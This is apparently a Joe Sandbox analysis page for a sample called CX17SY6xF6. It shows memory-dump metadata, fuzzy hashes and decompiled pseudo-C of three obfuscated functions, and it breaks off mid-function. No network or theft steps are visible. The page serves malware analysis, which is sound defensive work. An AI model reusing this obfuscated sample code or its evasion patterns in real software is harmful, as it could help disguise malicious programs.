                                                                                                                                                                                                                                                    0x010e8041
                                                                                                                                                                                                                                                    0x010e804c
                                                                                                                                                                                                                                                    0x010e8068
                                                                                                                                                                                                                                                    0x010e8071
                                                                                                                                                                                                                                                    0x010e8086
                                                                                                                                                                                                                                                    0x010e809b
                                                                                                                                                                                                                                                    0x010e80a1
                                                                                                                                                                                                                                                    0x010e80a9
                                                                                                                                                                                                                                                    0x010e80bf
                                                                                                                                                                                                                                                    0x010e80cc
                                                                                                                                                                                                                                                    0x010e80d5
                                                                                                                                                                                                                                                    0x010e80d9
                                                                                                                                                                                                                                                    0x010e80e2
                                                                                                                                                                                                                                                    0x010e80f0
                                                                                                                                                                                                                                                    0x010e810f
                                                                                                                                                                                                                                                    0x010e813c
                                                                                                                                                                                                                                                    0x010e8165
                                                                                                                                                                                                                                                    0x010e818b
                                                                                                                                                                                                                                                    0x010e8194
                                                                                                                                                                                                                                                    0x010e81ad
                                                                                                                                                                                                                                                    0x010e81cc
                                                                                                                                                                                                                                                    0x010e81d3
                                                                                                                                                                                                                                                    0x010e81e4
                                                                                                                                                                                                                                                    0x010e82c5
                                                                                                                                                                                                                                                    0x010e82ca
                                                                                                                                                                                                                                                    0x010e82d5
                                                                                                                                                                                                                                                    0x010e82e9
                                                                                                                                                                                                                                                    0x010e8302
                                                                                                                                                                                                                                                    0x010e830d
                                                                                                                                                                                                                                                    0x010e8317
                                                                                                                                                                                                                                                    0x010e8320
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e8325
                                                                                                                                                                                                                                                    0x010e81f4
                                                                                                                                                                                                                                                    0x010e8208
                                                                                                                                                                                                                                                    0x010e821e
                                                                                                                                                                                                                                                    0x010e823a
                                                                                                                                                                                                                                                    0x010e824a
                                                                                                                                                                                                                                                    0x010e8254
                                                                                                                                                                                                                                                    0x010e826b
                                                                                                                                                                                                                                                    0x010e8279
                                                                                                                                                                                                                                                    0x010e8286
                                                                                                                                                                                                                                                    0x010e82a6
                                                                                                                                                                                                                                                    0x010e82af
                                                                                                                                                                                                                                                    0x010e82b8
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 107b39615479c657c3153bc73499c8ae749a25bdfddf441bac328a0104a5c8e3
                                                                                                                                                                                                                                                    • Instruction ID: 3b178e451387a39cddc6411c3f1c79343debf237e550cbe784bc5ef05692f547
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 107b39615479c657c3153bc73499c8ae749a25bdfddf441bac328a0104a5c8e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23F14F74A04118DFCB18CF99D4909ADBBB2FF9D304F14C16AE865AB358C776A991CF80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 20ccaebaf981a19413a1b625653d5be60b5b52c72d6661771b4a52b9a6544ae1
                                                                                                                                                                                                                                                    • Instruction ID: b50d19a1f70a86362f598c9d60582e1e76cb3505e74c86f2128b74e71e1a1628
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20ccaebaf981a19413a1b625653d5be60b5b52c72d6661771b4a52b9a6544ae1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3B1F020E2AF414DD2379A39883133AB65CAFBB2D5F51D72BFC6674D16EB2285D34240
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010E8850(intOrPtr _a4, signed int _a8, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _t152;
                                                                                                                                                                                                                                                    				intOrPtr _t166;
                                                                                                                                                                                                                                                    				intOrPtr _t168;
                                                                                                                                                                                                                                                    				intOrPtr _t171;
                                                                                                                                                                                                                                                    				intOrPtr _t182;
                                                                                                                                                                                                                                                    				intOrPtr _t197;
                                                                                                                                                                                                                                                    				intOrPtr _t234;
                                                                                                                                                                                                                                                    				intOrPtr _t272;
                                                                                                                                                                                                                                                    				intOrPtr _t290;
                                                                                                                                                                                                                                                    				intOrPtr _t301;
                                                                                                                                                                                                                                                    				intOrPtr _t306;
                                                                                                                                                                                                                                                    				intOrPtr _t307;
                                                                                                                                                                                                                                                    				intOrPtr _t312;
                                                                                                                                                                                                                                                    				intOrPtr _t316;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v36 = _a24 - 0xe5;
                                                                                                                                                                                                                                                    				_v16 = _a28 - 0x2674;
                                                                                                                                                                                                                                                    				_v20 = _a24 - 0x191;
                                                                                                                                                                                                                                                    				_v24 = _a28 + 0x1c6;
                                                                                                                                                                                                                                                    				_v32 = _a8 ^ 0x0000002f;
                                                                                                                                                                                                                                                    				_v28 = _a8 - 0x2796;
                                                                                                                                                                                                                                                    				_v12 = _a28 + 0x1c6;
                                                                                                                                                                                                                                                    				_v8 = _a20;
                                                                                                                                                                                                                                                    				if(_v32 <= _v8 + 0x65) {
                                                                                                                                                                                                                                                    					_t152 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t312 =  *0x116d6a0; // 0x0
                                                                                                                                                                                                                                                    					if( *0x01D1B271 < (_t312 +  *((intOrPtr*)(_t152 + 0xd4)) | 0x00002565)) {
                                                                                                                                                                                                                                                    						_v20 = _v20 -  *((intOrPtr*)(_a4 + 0xbadbc1)) +  *(_a4 + 0xf4);
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						if(_v36 >= ( *(_a4 + 0x30) & 0x000025a0) &&  *0x01D1B241 >=  *0x01D1B1DD -  *((intOrPtr*)(_a4 + 0x68))) {
                                                                                                                                                                                                                                                    							_t272 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_v12 = ( *((intOrPtr*)(_t272 + 0xbadbfd)) - 0x25a0) * _v12;
                                                                                                                                                                                                                                                    							_t166 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_v28 = (_v8 ^  *(_t166 + 0xd4)) * _v8 | _v28;
                                                                                                                                                                                                                                                    							_t168 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_v60 = (_v12 ^ _v16) +  *((intOrPtr*)(_t168 + 0xa4));
                                                                                                                                                                                                                                                    							_v56 = _a4;
                                                                                                                                                                                                                                                    							_v52 = _v32 | 0x00002674;
                                                                                                                                                                                                                                                    							_v48 = _v16 ^ _v12;
                                                                                                                                                                                                                                                    							_v44 = _v20 & _v8;
                                                                                                                                                                                                                                                    							_t171 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t119 = _t171 + 0x8c; // 0x0
                                                                                                                                                                                                                                                    							_v40 =  *0x01D1B219 -  *_t119;
                                                                                                                                                                                                                                                    							_v16 = E010E5EA0(_v60, _v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                    							 *0x116d62c = ( *(_a4 + 0x40) & _v12) *  *0x116d62c;
                                                                                                                                                                                                                                                    							 *(_a4 + 0xb0) = _v8 & 0x00002628 ^  *(_a4 + 0xb0);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					 *(_a4 + 0xb4) =  *(_a4 + 0xb4) * 0x43f95;
                                                                                                                                                                                                                                                    					_v24 = _v24 - 0x39;
                                                                                                                                                                                                                                                    					_t234 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t234 + 0x78)) < 0x387f) {
                                                                                                                                                                                                                                                    						 *(_a4 + 0xbadbfd) =  *(_a4 + 0xbadbfd) | 0x00114117;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t182 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t33 = _t182 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					if( *_t33 !=  *((intOrPtr*)(_a4 + 0x7c))) {
                                                                                                                                                                                                                                                    						_t307 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_a4 + 0xf4) =  *((intOrPtr*)(_t307 + 0xbadc71)) + 0x45d2;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t290 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t290 + 0xb4)) != 0x425f) {
                                                                                                                                                                                                                                                    						_t306 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t46 = _t306 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    						_t197 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t197 + 0xec) =  *((intOrPtr*)(_a4 + 0x9c)) -  *((intOrPtr*)(_a4 + 0xbadc71)) + 0x000e606d ^  *_t46;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a4 + 0x10)) <= 0x122a8) {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x3c)) = 0x161485;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *(_a4 + 0xb4) != 0x111b0) {
                                                                                                                                                                                                                                                    						_t301 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t316 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t55 = _t301 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x14)) = ( *_t55 ^  *(_t316 + 0xa4)) +  *((intOrPtr*)(_a4 + 0x14)) + 0x1895d7;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *0x116d668 =  *((intOrPtr*)(_a4 + 0xb8)) + 0x00107368 |  *0x116d668;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a4 + 0x8c)) <= 0xb84a) {
                                                                                                                                                                                                                                                    						 *0x116d6b0 = 0x6f;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *(_a4 + 0x40) =  *(_a4 + 0xe4) ^  *(_a4 + 0xf4) ^ 0x00014d63 ^  *(_a4 + 0x40);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8 ^ 0x000003bc;
                                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                                    0x010e885f
                                                                                                                                                                                                                                                    0x010e886b
                                                                                                                                                                                                                                                    0x010e8877
                                                                                                                                                                                                                                                    0x010e8882
                                                                                                                                                                                                                                                    0x010e888b
                                                                                                                                                                                                                                                    0x010e8897
                                                                                                                                                                                                                                                    0x010e88a2
                                                                                                                                                                                                                                                    0x010e88a8
                                                                                                                                                                                                                                                    0x010e88b4
                                                                                                                                                                                                                                                    0x010e8a91
                                                                                                                                                                                                                                                    0x010e8a96
                                                                                                                                                                                                                                                    0x010e8aaf
                                                                                                                                                                                                                                                    0x010e8c1b
                                                                                                                                                                                                                                                    0x010e8ab5
                                                                                                                                                                                                                                                    0x010e8acd
                                                                                                                                                                                                                                                    0x010e8b0c
                                                                                                                                                                                                                                                    0x010e8b1f
                                                                                                                                                                                                                                                    0x010e8b2a
                                                                                                                                                                                                                                                    0x010e8b40
                                                                                                                                                                                                                                                    0x010e8b51
                                                                                                                                                                                                                                                    0x010e8b5d
                                                                                                                                                                                                                                                    0x010e8b63
                                                                                                                                                                                                                                                    0x010e8b6f
                                                                                                                                                                                                                                                    0x010e8b78
                                                                                                                                                                                                                                                    0x010e8b81
                                                                                                                                                                                                                                                    0x010e8b8c
                                                                                                                                                                                                                                                    0x010e8b97
                                                                                                                                                                                                                                                    0x010e8b9d
                                                                                                                                                                                                                                                    0x010e8bc0
                                                                                                                                                                                                                                                    0x010e8bdc
                                                                                                                                                                                                                                                    0x010e8bf6
                                                                                                                                                                                                                                                    0x010e8bf6
                                                                                                                                                                                                                                                    0x010e8bfc
                                                                                                                                                                                                                                                    0x010e88ba
                                                                                                                                                                                                                                                    0x010e88ca
                                                                                                                                                                                                                                                    0x010e88d6
                                                                                                                                                                                                                                                    0x010e88d9
                                                                                                                                                                                                                                                    0x010e88e6
                                                                                                                                                                                                                                                    0x010e8908
                                                                                                                                                                                                                                                    0x010e8908
                                                                                                                                                                                                                                                    0x010e8914
                                                                                                                                                                                                                                                    0x010e891c
                                                                                                                                                                                                                                                    0x010e8926
                                                                                                                                                                                                                                                    0x010e892f
                                                                                                                                                                                                                                                    0x010e8944
                                                                                                                                                                                                                                                    0x010e8944
                                                                                                                                                                                                                                                    0x010e894a
                                                                                                                                                                                                                                                    0x010e895a
                                                                                                                                                                                                                                                    0x010e897c
                                                                                                                                                                                                                                                    0x010e8982
                                                                                                                                                                                                                                                    0x010e8988
                                                                                                                                                                                                                                                    0x010e898d
                                                                                                                                                                                                                                                    0x010e898d
                                                                                                                                                                                                                                                    0x010e89a6
                                                                                                                                                                                                                                                    0x010e89ab
                                                                                                                                                                                                                                                    0x010e89ab
                                                                                                                                                                                                                                                    0x010e89bf
                                                                                                                                                                                                                                                    0x010e89d1
                                                                                                                                                                                                                                                    0x010e89d7
                                                                                                                                                                                                                                                    0x010e89dd
                                                                                                                                                                                                                                                    0x010e8a03
                                                                                                                                                                                                                                                    0x010e8a03
                                                                                                                                                                                                                                                    0x010e8a25
                                                                                                                                                                                                                                                    0x010e8a38
                                                                                                                                                                                                                                                    0x010e8a72
                                                                                                                                                                                                                                                    0x010e8a3a
                                                                                                                                                                                                                                                    0x010e8a6c
                                                                                                                                                                                                                                                    0x010e8a6c
                                                                                                                                                                                                                                                    0x010e8a7c
                                                                                                                                                                                                                                                    0x010e8c2a

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d952cf54786b2cd35b11213cd0dfd9da8dba06f6305eb102a81f72767b9c6424
                                                                                                                                                                                                                                                    • Instruction ID: 6c14b836d883b8678e0e330439dfee9be22e652047d4fa5d8a018f2bdcd29892
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d952cf54786b2cd35b11213cd0dfd9da8dba06f6305eb102a81f72767b9c6424
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9C14B70A001059FEB08CF58D594BADBBB2FB88304F14C27AEA599F795C735E981CB84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010D14C0(signed int _a4, signed int _a8, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				signed int _t112;
                                                                                                                                                                                                                                                    				intOrPtr _t113;
                                                                                                                                                                                                                                                    				intOrPtr _t114;
                                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                                    				intOrPtr _t149;
                                                                                                                                                                                                                                                    				intOrPtr _t159;
                                                                                                                                                                                                                                                    				intOrPtr _t172;
                                                                                                                                                                                                                                                    				intOrPtr _t174;
                                                                                                                                                                                                                                                    				void* _t175;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v20 = _a20 ^ 0x000003de;
                                                                                                                                                                                                                                                    				_v28 = _a20 ^ 0x000002ad;
                                                                                                                                                                                                                                                    				_v64 = _a4 - 0x26e5;
                                                                                                                                                                                                                                                    				_v68 = _a8 + 0x261;
                                                                                                                                                                                                                                                    				_v12 = _a8 ^ 0x00000236;
                                                                                                                                                                                                                                                    				_v24 = _a24 + 0xd9;
                                                                                                                                                                                                                                                    				_v8 = _a4 ^ 0x00000ee4;
                                                                                                                                                                                                                                                    				_v32 = _a8 ^ 0x00000327;
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_a28 + 0x74)) ==  *((intOrPtr*)(_a28 + 0xb4))) {
                                                                                                                                                                                                                                                    					_t174 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t25 = _t174 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    					_t149 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t149 + 0x5c)) =  *_t25 -  *((intOrPtr*)(_a28 + 0xb8)) + 0x44559;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v8 >= (_v12 ^ 0x00000236)) {
                                                                                                                                                                                                                                                    					if(_v8 < (_v28 ^ 0x000001b4)) {
                                                                                                                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							_t159 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t42 = _t159 + 0xb4; // 0x0
                                                                                                                                                                                                                                                    							if(_v16 >= ( *0x01D1B205 |  *_t42) - _v20) {
                                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_a28 + 0xbadbdd)) <= (_v8 ^ 0x00002565)) {
                                                                                                                                                                                                                                                    								_t129 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								_v60 = _t129;
                                                                                                                                                                                                                                                    								_v56 = _v28 + _v8 |  *(_a28 + 0x7c);
                                                                                                                                                                                                                                                    								_v52 = _v24 - _v8;
                                                                                                                                                                                                                                                    								_v48 =  *(_a28 + 0x78) | 0x00002633;
                                                                                                                                                                                                                                                    								_v44 = ( *(_a28 + 0x3c) |  *(_a28 + 0xe4)) & _v8;
                                                                                                                                                                                                                                                    								_v40 = (_v24 ^ 0x0000283a) & 0x000026e5;
                                                                                                                                                                                                                                                    								_v36 = _v20 + _v32 - 0x2674;
                                                                                                                                                                                                                                                    								_t112 = E010E8850(_v60, _v56, _v52, _v48, _v44, _v40, _v36);
                                                                                                                                                                                                                                                    								_t175 = _t175 + 0x1c;
                                                                                                                                                                                                                                                    								_v24 = _t112;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t113 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t172 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t33 = _t172 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    						_t114 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t114 + 0x5c) =  *(_t113 + 0xfc) ^ 0x0002ccfe ^  *_t33;
                                                                                                                                                                                                                                                    						_v12 = _v12 + 0x23;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L11:
                                                                                                                                                                                                                                                    				return _v12 - 0x254;
                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                    0x010d14ce
                                                                                                                                                                                                                                                    0x010d14da
                                                                                                                                                                                                                                                    0x010d14e6
                                                                                                                                                                                                                                                    0x010d14f1
                                                                                                                                                                                                                                                    0x010d14fd
                                                                                                                                                                                                                                                    0x010d1509
                                                                                                                                                                                                                                                    0x010d1514
                                                                                                                                                                                                                                                    0x010d1520
                                                                                                                                                                                                                                                    0x010d153b
                                                                                                                                                                                                                                                    0x010d1555
                                                                                                                                                                                                                                                    0x010d155b
                                                                                                                                                                                                                                                    0x010d1560
                                                                                                                                                                                                                                                    0x010d1566
                                                                                                                                                                                                                                                    0x010d1566
                                                                                                                                                                                                                                                    0x010d1575
                                                                                                                                                                                                                                                    0x010d1586
                                                                                                                                                                                                                                                    0x010d15c4
                                                                                                                                                                                                                                                    0x010d15d2
                                                                                                                                                                                                                                                    0x010d15da
                                                                                                                                                                                                                                                    0x010d15e6
                                                                                                                                                                                                                                                    0x010d15f2
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d1610
                                                                                                                                                                                                                                                    0x010d1616
                                                                                                                                                                                                                                                    0x010d161c
                                                                                                                                                                                                                                                    0x010d1634
                                                                                                                                                                                                                                                    0x010d163d
                                                                                                                                                                                                                                                    0x010d164b
                                                                                                                                                                                                                                                    0x010d1660
                                                                                                                                                                                                                                                    0x010d1672
                                                                                                                                                                                                                                                    0x010d1682
                                                                                                                                                                                                                                                    0x010d16a1
                                                                                                                                                                                                                                                    0x010d16a6
                                                                                                                                                                                                                                                    0x010d16a9
                                                                                                                                                                                                                                                    0x010d16a9
                                                                                                                                                                                                                                                    0x010d15cf
                                                                                                                                                                                                                                                    0x010d15cf
                                                                                                                                                                                                                                                    0x010d1588
                                                                                                                                                                                                                                                    0x010d1590
                                                                                                                                                                                                                                                    0x010d15a2
                                                                                                                                                                                                                                                    0x010d15a8
                                                                                                                                                                                                                                                    0x010d15ab
                                                                                                                                                                                                                                                    0x010d15b0
                                                                                                                                                                                                                                                    0x010d15b9
                                                                                                                                                                                                                                                    0x010d15b9
                                                                                                                                                                                                                                                    0x010d1586
                                                                                                                                                                                                                                                    0x010d16b1
                                                                                                                                                                                                                                                    0x010d16bc

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9c03f109cdae7340c0dccf87c064ef5462035fe7267539351b9fdc6b29a7118f
                                                                                                                                                                                                                                                    • Instruction ID: 3591e1690de3afd7ce8d420c18b64044041db4b1bba167a0f08bdfaa61db5c26
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c03f109cdae7340c0dccf87c064ef5462035fe7267539351b9fdc6b29a7118f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A061FA70A00109DFDB08CF98D590AAEBBF5FF4C304F55826AE955AB355C734A941CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DAC2C(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t74 = _a4;
                                                                                                                                                                                                                                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                                    				if(_t25 != 0 && _t25 != 0x116dd10) {
                                                                                                                                                                                                                                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                                    						if(_t46 != 0 &&  *_t46 == 0) {
